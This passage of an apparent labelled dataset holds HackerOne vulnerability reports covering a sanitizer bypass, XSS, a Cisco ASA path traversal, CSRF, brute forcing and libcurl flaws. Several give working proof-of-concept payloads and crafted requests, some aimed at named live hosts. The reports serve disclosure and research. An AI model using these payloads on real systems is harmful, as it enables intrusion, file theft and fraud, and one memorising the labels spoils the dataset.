to 1.4.3 even though the Hackerone report about this vulnerability suggested that this should fix it (see here: https://hackerone.com/reports/1530898).\n\nI built this app with Rails 7.0.3.1 by just running \"rails new\", adding `config.action_view.sanitized_allowed_tags = [\"select\", \"style\"]` to the file `config/application.rb` and creating an endpoint that reflected a parameter after sanitizing it (ERB: `

    Hello <%= sanitize @name %>

    `). When using the payload `` for the parameter I got an alert no matter what the version of rails-html-sanitizer was.\n\nI believe the reason is the following. There are two ways you can pass the list of allowed tags to the sanitizer. One is via a list of tags stored in a class attribute, the other is via an argument passed into the `sanitize` method. The fix only considered the second way but the first one was forgotten. See the commit with the fix here: https://github.com/rails/rails-html-sanitizer/commit/c871aa4034d3d80ad67cf33a3462154b0a0fb477#diff-0daf33b9062eb5ccdeae86ed8bf2662a6e8669f1a7db590802b7f3b36ea47426R159\nThe relevant part of the code is this:\n\n```ruby\nmodule Rails\n module Html\n class SafeListSanitizer < Sanitizer\n ...\n def remove_safelist_tag_combinations(tags)\n if !loofah_using_html5? && tags.include?(\"select\") && tags.include?(\"style\")\n warn(\"WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'\")\n tags.delete(\"style\")\n end\n tags\n end\n\n def allowed_tags(options)\n if options[:tags]\n remove_safelist_tag_combinations(options[:tags])\n else\n self.class.allowed_tags\n end\n end\n ...\n end\n end\nend\n```\n\nMethod `remove_safelist_tag_combinations` is introduced to remove `style` from the allow list if `select` is in there. However, within method `allowed_tags` this cleanup is only applied to the tag list in the `options`, not to ` self.class.allowed_tags`, the list stored in the sanitizer class.\nHowever, it seems that the configuration in `config/application.rb` which I've set above put the list into the class variable (I've sprinkled a few `puts` here and there to confirm that).\n\nMoreover, when moving the allow list from `config/application.rb` into the ERB template\n(`

    Hello <%= sanitize @name, tags: [\"select\", \"style\"] %>

    `), the update from\n1.4.2 to 1.4.3 does fix the problem.\n\nThe following patch to https://github.com/rails/rails-html-sanitizer should complete the fix for CVE-2022-32209 (also added a test, which is mostly copy&paste from the test method `test_disallow_the_dangerous_safelist_combination_of_select_and_style` found in the commit linked above):\n\n```\nFrom fb9882599684f5796805107ec98f6a18bba722ec Mon Sep 17 00:00:00 2001\nFrom: Dominic Breuker \nDate: Fri, 29 Jul 2022 23:08:57 +0200\nSubject: [PATCH] disallow select and style in safelist also when specified in\n sanitizer class allowed_tags list\n\n---\n lib/rails/html/sanitizer.rb | 6 +-----\n test/sanitizer_test.rb | 20 ++++++++++++++++++++\n 2 files changed, 21 insertions(+), 5 deletions(-)\n\ndiff --git a/lib/rails/html/sanitizer.rb b/lib/rails/html/sanitizer.rb\nindex 97503c8..4a0d43f 100644\n--- a/lib/rails/html/sanitizer.rb\n+++ b/lib/rails/html/sanitizer.rb\n@@ -155,11 +155,7 @@ module Rails\n end\n \n def allowed_tags(options)\n- if options[:tags]\n- remove_safelist_tag_combinations(options[:tags])\n- else\n- self.class.allowed_tags\n- end\n+ remove_safelist_tag_combinations(options[:tags] || self.class.allowed_tags)\n end\n \n def allowed_attributes(options)\ndiff --git a/test/sanitizer_test.rb b/test/sanitizer_test.rb", "source": "hackerone", "timestamp": "2022-12-14", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "4e69fba6b732ced7d777", "text": "[Information Disclosure] HEIC image preview can be used to invoke Imagick\n\nThe HEIC image preview provider calls into Imagick at https://github.com/nextcloud/server/blob/5d097ddb4b99673f57b8c085dedd93880ee2539d/lib/private/Preview/HEIC.php#L98-L109. This is bad as Imagick processes all kind of image types.\n\nOne can use this for example to exfiltrate arbitrary files by passing a SVG file that contains a `xlink:href` to a locally existing file. There are also other concerns with regard to SSRF and XML parsing done by Imagick.\n\nA super naive example, uploading a file such as \"test.heic\" with this content will render the file \"nextcloud20.png\" inside it. (but you can also reference PDFs, or use it for SSRF, etc etc.\n\n`test.heic`:\n```\n\n\n \n\n```\n\nPreview:\n\n{F1376376}\n\n## Impact\n\nGaining access to arbitrary files on the system, SSRF, etc.", "source": "hackerone", "timestamp": "2023-01-07", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "94f3f29fa3fd208e2d0f", "text": "[Unknown] [Java] CWE-016: Query to detect insecure configuration of Spring Boot Actuator\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-05-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e79649fb8b30b5234ef2", "text": "[Business Logic Errors] captcha bypass leads to register multiple user with one valid captcha\n\n## Summary:\nHi team,\nwhen we register in valley connect, captcha now expire and we can use single valid captcha for register and call to many user.\n\n## Steps To Reproduce:\n1. go to login form : https://valleyconnect.tva.gov/registration\n2. complete form and click on submit registration, then intercept request with burp\n3. use intruder for call multiple request, we should replace email in every request.\n\n```\nPOST /registration HTTP/2\nHost: valleyconnect.tva.gov\n\nUserName=admin&Password=jgn%25%5EThgf%23rfvHRESdy56tef&ConfirmPassword=jgn%25%5EThgf%23rfvHRESdy56tef&EmailAddress=E%40jetamooz.com&EmailAddressVerify=E%40jetamooz.com&FirstName=alex&LastName=jane&Initials=&Suffix=&JobTitle=it&OrganizationType=Business+Partner&OrganizationName=sarv&Country=792&StreetAddress=sary&City=katy&Province=titi&State=AL&ZipCode=&PhoneNumber=%28934%29+734-4364&MobilePhoneNumber=%28957%29+363-4655&TimeZone=America%2FLos_Angeles&CapAnswer=U4YIQ&CapKey=XXTxVOUWZrCz6buVtsgF2cFaPHLSCKVSRQc4z4My13Bee8JiTYVZXmiPd8zLSbMc&BeCheck=\n```\n\n\n## Supporting Material/References:\n\n{F2781078}\n{F2781077}\n{F2781085}\n{F2781080}\n\n## Impact\n\nwe can bypass captcha and register too many user with one valid captcha", "source": "hackerone", "timestamp": "2023-11-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "27b5b8d3858018087287", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS at https://██████/██████ via \"██████\" parameter\n\nThere is Reflected Cross site scripting issue at the following url:\n\nhttps://██████████/██████\n\nProof Of Concept\n\nhttps://████████/█████████████████=%22%3E%3Csvg/onload=alert(1)%3E��████████\n\n█████\n\nBest Regards\n\n@pelegn\n\n## Impact\n\nCookies Exfiltration\nSOAP Bypass\nCORS Bypass\nExecuting javascript on the victim behalf\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nNavigate to https://████████/████████████████████████=%22%3E%3Csvg/onload=alert(1)%3E██████████\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-02-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "80a0274a2a35b91b270d", "text": "[Business Logic Errors] Federated share accepting/declining is not logged in audit log\n\nIn relation to https://hackerone.com/reports/1177353\n\n1. Enable the audit log\n2. Share a file to a federated user\n3. So far all looks good in the log\n4. the recipient checks either accepts or declines the share\n5. There is no line regarding this in the logs.\n\n## Impact\n\nThe audit log is used to get a full trail of the actions which is now incompletely. With possible important information.\nIt seems to be also listed on https://portal.nextcloud.com/article/using-the-audit-log-44.html\nFrom my point of view a declined share is unshared again.", "source": "hackerone", "timestamp": "2022-09-03", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "aeae996457152f5f9bbd", "text": "[Business Logic Errors] CURLOPT_SSH_HOST_PUBLIC_KEY_MD5 bypass if string not 32 chars\n\n## Summary:\nDue to logic flaw in `CURLOPT_SSH_HOST_PUBLIC_KEY_MD5` handling, the host fingerprint validation will be bypassed if the passed a string that is not exactly 32 characters long.\n\n## Steps To Reproduce:\n 1. `curl_easy_setopt(curl, CURLOPT_SSH_HOST_PUBLIC_KEY_MD5, \"afe17cd62a0f3b61f1ab9cb22ba269a\"); // 31 chars`\n 2. perform` sftp://` or `scp://` actions \n\nNote: `curl` command is not affected since it explicitly checks that the `--hostpubmd5` string is 32 characters long, and if it is not `PARAM_BAD_USE` is returned.\n\nThe bug is at https://github.com/curl/curl/blob/f7f26077bc563375becdb2adbcd49eb9f28590f9/lib/vssh/libssh2.c#L733\n\nIf the string length is other than 32 it should result in signature check failure instead of success. Obvious fix would be to remove the `if(pubkey_md5 && strlen(pubkey_md5) == 32)`test completely.\n\n## Impact\n\nSSH host identify bypass.\n\nFor this issue to be realised, a wrong size fingerprint needs to be passed (either by accident or by malice). It is likely that this is far more likely to happen by accident, since if some actor can tamper with the fingerprints they can bypass the validation anyway. Note that `curl_easy_setopt` `CURLOPT_SSH_HOST_PUBLIC_KEY_MD5` does not return an error indicating that something is wrong, hence this is breaking the principle of least surprise.", "source": "hackerone", "timestamp": "2022-04-25", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "98e3fdebbd0bf0bb0fe0", "text": "[Unknown] [Python]: Timing attack\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "97d0fc5b25e095bd0e81", "text": "[Cleartext Transmission of Sensitive Information] CVE-2022-30115: HSTS bypass via trailing dot\n\nAdvisory: https://curl.se/docs/CVE-2022-30115.html\n\nOriginal Report: https://hackerone.com/reports/1557449\n\n## Impact\n\nHSTS bypass", "source": "hackerone", "timestamp": "2022-06-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "9de547c0d7039a9b84e0", "text": "[Cross-Site Request Forgery (CSRF)] 0-day Cross Origin Request Forgery vulnerability in Grafana 8.x .\n\n## Disclaimer\n\nTo triage, please note that this is still a 0-day that was alerted to Grafana already, in order to make sure the client is safe I report this issue now, please make sure to not spread it further or leak it, as the best interest is to let you be aware and safer from any potential attacks in the meantime.\n\n## Description\n\n@jub0bs and I have found a cross-origin request forgery attack issue in the Grafana instances hosted on the Aiven platforms (CVE-2022-21703, which is still a 0-Day CVE on Grafana) . \nWith the cross-origin request forgery attack it's possible for an attacker to successfully mount cross-origin request forgery attack against authenticated victims of other grafana instances hosted on `*.aivencloud.com`.\n\n## Exploitation\n\nSo here is the attack story an example user John Doe runs a grafana instance at `https://johndoe.aivencloud.com`.\nAn attacker will deploy his own grafana instance at `https://attacker.aivencloud.com`, this attacker's instance would host a malicous html file with a javascript payload, that will trigger the cross-origin request forgery attack against John Doe while he is logged into `https://johndoe.aivencloud.com` .\n\nNow thanks to this attack all POST / GET requests would work thanks to the cross-origin-request-forgery attack, the root cause of this is because grafana sets their auth cookie `grafana_session` to `SameSite=Lax; Secure` https://jub0bs.com/posts/2021-01-29-great-samesite-confusion/\n\n## Attack Chain.\n\nThe attack chain is as follows;\n\n- Attacker would send a link to the victim.\n- When the victim clicks the link, victim will be forced into logging into the attackers grafana instance via login CSRF.\n- User would be redirected to a vulnerable SSRF endpoint on the attackers grafana instance, this endpoint would trigger cross-origin-request-forgery attack (CVE-2022-21703, which is still a 0-Day CVE on Grafana) to the victims grafana instance.\n- Attack is complete, now the CSRF would have triggered the following actions ;\n* force the victim to create a new user on the victims grafana instance.\n* force the victim to create a dashboard\n\n{F1588743}\n\n## Requirements.\n\n- three seperate web browser instances .\n- a http / https file server to host our payloads.\n- python2.\n- pip2.\n\n## Steps to Reproduce .\n\n1. Login into Aiven Console, at https://console.aiven.io, in a new browser instance let's call it B-1.\n2. On B1, create two new Grafana instance, name the first one attacker and the second victim, wait till it's up and running.\n\n{F1588761}\n\n3. Now click on the Grafana attacker instance in the Aiven Console, then head to the bottom of that page.\n\n{F1588762}\n\n{F1588760}\n\n4. Add the below advanced configurations;\n\n```\nallow_embedding\ncookie_samesite --> none\n```\n\n{F1588759}\n\nThen click the `Save advanced configuration` button.\n\n5. Open a new browser instance, call it B-attacker, log into the attacker grafana instance.\n\n{F1588758}\n\n6. On B-attacker, open up dev tools, then copy & note down the value of your grafana `grafana_session` cookie .\n\n{F1588757}\n\n7. Now its time to save our cross-origin-request-forgery payload .\n\n```html\n\n \n \n

    cross-origin-request-forgery POC

    \n
    \n }\n 3. Now save the form by filling rest columns.\n 4. If any one views public profile and click on HTML tag, it will trigger XSS.\n\nProof Of Concept:\nVideo POC attached\n\n## Impact\n\nAttacker can execute XSS in the victim user using judge platform", "source": "hackerone", "timestamp": "2023-02-01", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "da8f58d74e664b7c8ec8", "text": "[Improper Restriction of Authentication Attempts] Entering passwords on the Share Login Page can lead to a brute-force attack\n\n## Summary:\nI have identified that when sharing the Results with a password, the request (POST method) when entering a password has no rate limit, which can then be used to loop through one request. An attacker can brute-force for a password and can get a possibly a dashboard Results.\n\nA rate limiting algorithm is used to check if the user session (or IP-address) has to be limited based on the information in the session cache. In case a client made too many requests within a given timeframe, HTTP-Servers can respond with status code 429: Too Many Requests.\n\nThe problem here is that the sharing links are crawled, so if there is a link that does not contain a password, the account information will be revealed, and if there is a password, it can be brute-forced .\n\n█████\n\n## Steps To Reproduce:\n1. Go to https://app.crowdsignal.com/share/███ (this my Survey)\n2. Enter any password and click Login.\n3. Intercept the request (you can use Burp Suite tool to do this)\n4.\n```\nPOST /share/████████/password HTTP/1.1\nHost: app.crowdsignal.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 43\nOrigin: https://app.crowdsignal.com\nConnection: close\nReferer: https://app.crowdsignal.com/share/██████\nCookie:\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\n\naction=password&nonce=██████████&password=§\n```\n5. Now Send This Request To Intruder And brute-force it 1000 times with a list of 1000 passwords.\n6. See that you will get a length of 297 when the password is incorrect and when you get 414 that is the correct password.\n\n\n## Supporting Material/References:\n████\n\n## Impact\n\nIf an attacker successfully brute forces the password, they may be able to access the following: Results, Answer Details, Devices, Locations, and Participants.", "source": "hackerone", "timestamp": "2023-08-27", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "45c01c0bfe288f87c5a2", "text": "[Expected Behavior Violation] CVE-2023-28322: more POST-after-PUT confusion\n\n## Summary:\nCVE-2022-32221 fixes is insufficient.\nIn CVE-2022-32221, only CURLOPT_POST was corrected.\nHowever, CURLOPT_POST is not necessarily used when sending data with the POST method.\nCURLOPT_POST is not used in the CURLOPT_POSTFIELDS usage example on the official website.\n```\nCURL *curl = curl_easy_init();\nif(curl) {\n const char *data = \"data to send\";\n \n curl_easy_setopt(curl, CURLOPT_URL, \"https://example.com\");\n \n /* size of the POST data */\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, 12L);\n \n /* pass in a pointer to the data - libcurl will not copy */\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, data);\n \n curl_easy_perform(curl);\n}\n```\nAlso on this page is the following statement.\n\n>Using CURLOPT_POSTFIELDS implies setting CURLOPT_POST to 1.\n\nhttps://curl.se/libcurl/c/CURLOPT_POSTFIELDS.html\n\nI think it means that some users do not use CURLOPT_POST.\nJust to be clear, CURLOPT_POSTFIELDS does not set a `FLASE` on `data->set.upload`.\n\nCURLOPT_POST is not used in the CURLOPT_MIMEPOST usage example either.\nhttps://curl.se/libcurl/c/CURLOPT_MIMEPOST.html\n\nBased on the above, I think we need to modify the following to assign `FALSE` to `data->set.upload` if we use the following.\n* CURLOPT_POSTFIELDS\n* CURLOPT_COPYPOSTFIELDS\n* CURLOPT_MIMEPOST\n\nWe could not determine the deprecated CURLOPT_HTTPPOST.\n\n## Steps To Reproduce:\nAlmost the same source as #1704017. The difference is that line 52 is commented out.\n\n```\n#include \n#include \n#include \n\ntypedef struct\n{\n char *buf;\n size_t len;\n} put_buffer;\n\nstatic size_t put_callback(char *ptr, size_t size, size_t nmemb, void *stream)\n{\n put_buffer *putdata = (put_buffer *)stream;\n size_t totalsize = size * nmemb;\n size_t tocopy = (putdata->len < totalsize) ? putdata->len : totalsize;\n memcpy(ptr, putdata->buf, tocopy);\n putdata->len -= tocopy;\n putdata->buf += tocopy;\n return tocopy;\n}\n\nint main()\n{\n CURL *curl = NULL;\n put_buffer pbuf = {};\n char *otherdata = \"This is some other data\";\n\n curl_global_init(CURL_GLOBAL_DEFAULT);\n\n curl = curl_easy_init();\n\n // PUT\n curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);\n curl_easy_setopt(curl, CURLOPT_READFUNCTION, put_callback);\n pbuf.buf = strdup(\"This is highly secret and sensitive data\");\n pbuf.len = strlen(pbuf.buf);\n curl_easy_setopt(curl, CURLOPT_READDATA, &pbuf);\n curl_easy_setopt(curl, CURLOPT_INFILESIZE, pbuf.len);\n curl_easy_setopt(curl, CURLOPT_URL, \"http://host1.com/putsecretdata\");\n curl_easy_perform(curl);\n\n // Without this line, a PUT instead of a POST will be sent below (this is a bug in libcurl)\n //curl_easy_setopt(curl, CURLOPT_UPLOAD, 0L);\n\n // Without this line, the POST below will send \"This is highly secret and sensitive data\"\n // when instead the user intended to send \"This is some other data\"\n // With this line, the program will attempt to use freed data, causing a segfault or any number\n // of potential exploits.\n //free(pbuf.buf);\n\n // POST (will be a PUT without the line just above)\n //curl_easy_setopt(curl, CURLOPT_POST, 1L);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, otherdata);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, strlen(otherdata));\n curl_easy_setopt(curl, CURLOPT_URL, \"http://host2.com/postotherdata\");\n curl_easy_perform(curl);\n\n curl_easy_cleanup(curl);\n\n curl_global_cleanup();\n\n return 0;\n}\n```\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nAn attacker could potentially inject data, either from stdin or from an unintended buffer. Further, without even an active attacker, this could lead to segfaults or sensitive information being exposed to an unintended recipient.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "2838355cee747583d865", "text": "[Cross-site Scripting (XSS) - DOM] XSS on Brave Today through custom RSS feed\n\n## Summary:\n\nTwo months ago, the [custom RSS feed feature](https://github.com/brave/brave-ios/pull/3317) was introduced to Brave Today on Brave iOS.\n\nThis feature allows to add any RSS feed to Brave Today, and the registered feed entries are shown in a tab with a hyperlink to the original article URL.\nThen, Brave iOS doesn't restrict the URL scheme of the original article link, which can cause XSS weakness through `javascript:` URL.\n\nHere is a demonstration RSS feed of this attack.\nhttps://csrf.jp/brave/rss.php\n\nThis RSS feed contains `javascript:alert(document.domain)` in an entry tag like this.\n```\n\n XSS\n \n ]]>\n\n```\nWhen user taps the entry on Brave Today, an alert dialog is shown on `http://localhost:65XX`.\n\n## Products affected: \n\n * Brave iOS current Nightly build\n\n## Steps To Reproduce:\n\n * Open \"Settings\"\n * Tap \"Brave Today\" in Settings menu\n * Tap \"Add Source\"\n * Type \"https://csrf.jp/brave/rss.php\" and tap \"Search\"\n * RSS feed, that name is PoC, is found, then tap \"Add\"\n * Enable PoC feed\n * Close the Settings menu and open a new tab\n * Enable Brave Today, then you can find an article entry that name is \"XSS\"\n * Tap the article, then an alert dialog is shown\n\n## Supporting Material/References:\n\n * See attached movie file for the demonstration\n\n## Impact\n\nAs written in summary, XSS is possible on `http://localhost:65XX`.\nNote that `http://localhost:65XX` should be considered as a privileged domain that hosts Brave's internal features such as reader-view, error-pages and so on.", "source": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "f7a21069d89491ddc286", "text": "[Path Traversal] [CVE-2020-3452] Unauthenticated file read in Cisco ASA\n\ni found out that https://█████████/ was vulnerable to CVE-2020-3452\n\nThe IP has a SSL certificate pointing to █████████\ncurl -kv https://██████████/ \n\nOutput\n```\nServer certificate:\n* subject: C=US; ████.mil\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\n1. https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n2. https://███████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86", "source": "hackerone", "timestamp": "2022-05-12", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "80493eeb3f4870783847", "text": "[Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)] [h1-2102] HTML injection in packing slips can lead to physical theft\n\n## Summary:\nA HTML injection vulnerability exists in the packing slip generator, allowing customers to alter the logistical process of their and other's orders for shops that choose to display the user's e-mail address on the packing slip. The success rate depends on the shops setup and can result in financial losses for the affected stores.\n\n###Background - how stores use the packing slip\nOnce an order comes in, the packing slips and shipping labels get printed to be processed. From my understanding, when preparing orders, logistical teams don't go back and forth between the Shopify orders, but print the packing slips in bulk (hence the new ability to print in bulk), fill the boxes in the warehouse with whatever is on the packing slip, put on a shipping label on the box and send it off.\nShould the customer be able to alter these packing slips upon printing, it could be possible to alter what (and how many) items will be in their box. It is observed that this is possible using some CSS tweaks and a HTML injection in the e-mail field.\n\n## Prerequisites\n\n- You'll need a store with a product that you can order. You can either work with a bogus payment gateway, or set the price of the product to 0 and mark it as a non-physical good so there's no shipping costs involved.\n\n## Steps To Reproduce:\n- Go to admin > delivery and set a packing slip template that displays the user's e-mail address in the billing / checkout info. **You can use the one in the attachment** (packingslip.txt). The example should look like this:\n\n{F1171862}\n\n- As a customer, go to the store and check out the item. **Buy only one**, we'll alter the amount through this bug as a PoC.\n\n{F1171898}\n\n- Enter the following e-mail (yes, this is a valid e-mail address, see [RFC3696](https://tools.ietf.org/html/rfc3696)):\n\n> \"\"@gmail.com\n\n{F1171899}\n\n- Complete your order:\n\n{F1171900}\n\n- You're done! Now wait and profit!\n\n**From the shop employee's perspective, go to orders. You have a new order, yay!**\n\nFree product has been ordered one time. Great! Let's print the packing slip (in big stores this would be printed in bulk, so people wouldn't really notice anything):\n\n{F1171902}\n\nNotice that the packing slip looks like this:\n\n{F1171903}\n\nSeems like the logistics team will be shipping *1337* items in instead of 1. We only paid for 1.\nWe could also alter other stuff, like the actual item, or when printed in bulk, we could alter _other_ people's packing slip. The sky is the limit! This won't work for all shops, but when it does, the impact will be very effective.\n\n## Impact\n\n- Literally steal goods\n- Alter other people's stuff as well if they use the bulk printer (e.g. add a special note, put your return address on the slip instead of the shop's, etc...)", "source": "hackerone", "timestamp": "2022-07-11", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "baae07a1bf699c2a2b4a", "text": "[Business Logic Errors] KRB-FTP: Security level downgrade\n\n## Summary:\nlibcurl doesn't fail the FTP connection if Kerberos authentication fails for some reason, but rather reverts back to using regular clear text password authentication.\n\nThe logic is in`lib/ftp.c` `ftp_statemachine`: https://github.com/curl/curl/blob/07a9b89fedaec60bdbc254f23f66149b31d2f8da/lib/ftp.c#L2706\n\nThis means that active attacker in a man in the middle position can downgrade any attempt to use Kerberos FTP to regular one by merely forcing the Kerberos authentication to fail.\n\nThe more secure course of action would be to fail the FTP connection if Kerberos authentication fails. If such change is not deemed necessary the current limitations should be documented.\n\n## Steps To Reproduce:\n\n 1. MitM the connection and make the kerberos authentication fail\n 2. `curl --krb private ftp://victim.tld/`\n\n## Impact\n\n- Security level downgrade.", "source": "hackerone", "timestamp": "2022-06-05", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "df1beeb0f1f882582d89", "text": "[Unknown] CVE-2021-38314 @ https://www.mtn.ci\n\n## Summary:\nHello.\nI your domain https://www.mtn.ci was vulnerable to CVE-2021-38314\n\n##Description:\nThe Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`.\n\n##Referrence:\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314\nhttps://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/\n\n## Steps To Reproduce:\nVisit https://www.mtn.ci/wp-admin/admin-ajax.php?action=e1efc9f8463379b3427645c8df923e6d you will see ```037c4f460684e77a5f67fe148576121b```\n\n## Supporting Material/References:\n{F1461730}\n\n## Impact\n\nCVE-2021-38314", "source": "hackerone", "timestamp": "2022-09-05", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "e7d09dbf61cdeb3b772d", "text": "ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS\n\nSeverity: high", "source": "zeroscience", "timestamp": "2022-09-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "67add96d8ab4deed90bd", "text": "[Allocation of Resources Without Limits or Throttling] [curl] CVE-2023-38039: HTTP header allocation DOS\n\nHello reporting for CVE-2023-38039 which has been fixed in the latest release of curl today.\nLink to original report : #2072338\n\nThanks for your help, if there's anything else you need from me I'll happily share.\nHave a nice day !\n\n## Impact\n\nDOS/overloading of user's system through malicious HTTP server interaction with curl's header parsing.", "source": "hackerone", "timestamp": "2023-09-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "cfe01b96cf817f99fedc", "text": "[Unknown] [Java]: Add JDBC connection SSRF sinks\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-03-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "f363cb853ec906e5e606", "text": "[Violation of Secure Design Principles] Suspicious login app ships old league/flysystem version\n\n## Summary:\nThe vulnerability allows a remote attacker to compromise vulnerable system.\nThe vulnerability exists due to a race condition. A remote attacker can send a specially crafted request and execute arbitrary code on the target system.\n`Flysystem: 0.1.0 - 2.1.0`\n\n\nhttps://github.com/nextcloud/suspicious_login/\n```php\nremoveFunkyWhiteSpace($path);\n $this->rejectFunkyWhiteSpace($path);\n```\n\n**Supporting References:**\nThe unicode whitespace removal has been replaced with a rejection (exception).\nThe library has been patched in:\n * [1.x: thephpleague/flysystem@f3ad691](https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32)\n * [2.x: thephpleague/flysystem@a3c694d](https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74)\n\n**CVE-2021-32708**\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n[GHSA-9f46-5r25-5wfm](https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm)\n\n## Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions:\n * A user is allowed to supply the path or filename of an uploaded file.\n * The supplied path or filename is not checked against unicode chars.\n * The supplied pathname checked against an extension deny-list, not an allow-list.\n * The supplied path or filename contains a unicode whitespace char in the extension.\n * The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.", "source": "hackerone", "timestamp": "2023-02-08", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "834d9dfd4d42ec838586", "text": "[Session Fixation] CVE-2023-40273: Session fixation in Apache Airflow web interface\n\nWhen I reset the password of the test user through the button Reset Password, I hope that the person who previously had the password of the test user will lose the corresponding authority. However, if others have logged in to the test user before, they can still use the account.\n{F2630619}\n{F2630620}\nIn short,Change user password wouldn't prevent an already authenticated user from being able to continue using the UI or API.\n\n## Impact\n\nThe session fixation vulnerability allowed the authenticated user to continue accessing Airflow webserver even after the password of the user has been reset by the admin - up until the expiry of the session of the user.", "source": "hackerone", "timestamp": "2023-09-04", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "b3c72333d83696257c1c", "text": "[UI Redressing (Clickjacking)] Clickjacking login page of https://hackers.upchieve.org/login\n\nHello, you have discovered this unprotected login page\nhttps://hackers.upchieve.org/login\nAn attacker can \nin frame page\nin iframe \nand Deception of a user and obtaining a password, email and sensitive information\n\n## Impact\n\nAn attacker can \naDeception of a user and obtaining a password, email and sensitive information", "source": "hackerone", "timestamp": "2022-03-26", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "feaf28fef83333f1fe64", "text": "[Improper Synchronization] CVE-2023-28320: siglongjmp race condition\n\n## Summary:\nIf the system has no POSIX or Windows threading support, `USE_ALARM_TIMEOUT` codepath will be used in `lib/hostip.c`. If two threads will perform DNS resolving, a wrong register context can be used on the signal handler`siglongjmp` call if DNS timeout occurs. Typically this results in segmentation fault, but depending on platform specifics other impacts might be possible (but unlikely).\n\nThe documentation warns against this very issue in https://curl.se/libcurl/c/threadsafe.html `It is important that libcurl can find and use thread safe versions of these and other system calls, as otherwise it cannot function fully thread safe.` The issue is that there is no way for the application using libcurl to know if the library is MT safe for DNS resolution or not. `CURL_VERSION_THREADSAFE` is mentioned, but this checks availability of atomic init, not MT safety of DNS resolution.\n\nA remote attacker in a privileged network position is able to selectively block the DNS responses and may thus induce the affected target application to crash.\n\n## Steps To Reproduce:\n\n 1. For quick testing on POSIX systems add `#define USE_ALARM_TIMEOUT` to 